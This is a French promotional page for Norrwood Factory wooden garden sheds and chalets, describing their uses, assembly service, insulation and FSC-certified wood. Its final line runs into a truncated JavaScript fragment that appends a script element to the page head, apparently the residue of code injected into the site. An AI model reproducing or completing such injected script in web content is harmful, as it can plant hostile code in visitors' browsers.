mon jardin à prix d'usine
Abris bois garantis 10 ans

Abri et Cabane jardin

Tout savoir sur les cabanes de jardin, chalets et pièce à vivre d’extérieur

Pourquoi un abri de jardin en bois ou une cabane de jardin ?

 

 

Autre son utilité première de rangement ou de pièce à vivre, La cabane de jardin  s’intègre parfaitement dans votre jardin, il se retrouve ainsi au cœur de son élément naturel.

Avec ou sans plancher, petit ou grand Norrwood Factory sera répondre à votre demande ainsi qu’à vos exigences afin de vous proposer l’abri bois jardin le mieux adapté…

Très facile à monter, vous suivez étapes par étapes la construction de votre cabane de jardin. Si vous ne souhaitez pas faire le montage, pas de problème, l’équipe Norrwood factory se déplace partour en France continentale, composée de deux personnes avec leurs outils.

 

Quelle est la différence entre un abri  et un chalet en bois ?

 

L’abri de jardin est plutôt destiné au rangement d’outils, à la tondeuse, au mobilier de jardin lorsque l’hiver approche.

Ces cabanes en bois sont d’une surface allant de 1 à 12m2 en panneaux ou en planches emboîtées. Le chalet bois de jardin quant à lui est une véritable pièce à vivre, d’une surface allant de 8 à 20 m2 (ou plus) il offre l’avantage d’avoir pièce en plus dans son jardin.

Celle-ci vous permet par exemple de créer une chambre d’amis, un bureau, une salle de jeux, de sport ou de musique sans agrandir votre maison et à moindre coût !

votre chalet bois de jardin devient votre « maison » secondaire.

 

Performances techniques  :

 

Les abris de jardin ou chalets bois possèdent une capacité naturelle d’isolation thermique.

A épaisseur égale, le bois se révèle 6 fois plus isolant que la brique, 15 fois plus que le béton et 400 fois plus que l’acier.

Le bois est un matériau naturel et vivant. « Nos » bois sont tous certifiés FSC (Forest Stewardship Council).
Cet écolabel garantit une gestion responsable des forêts et oblige à des normes écologiquement et socialement responsables.d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) {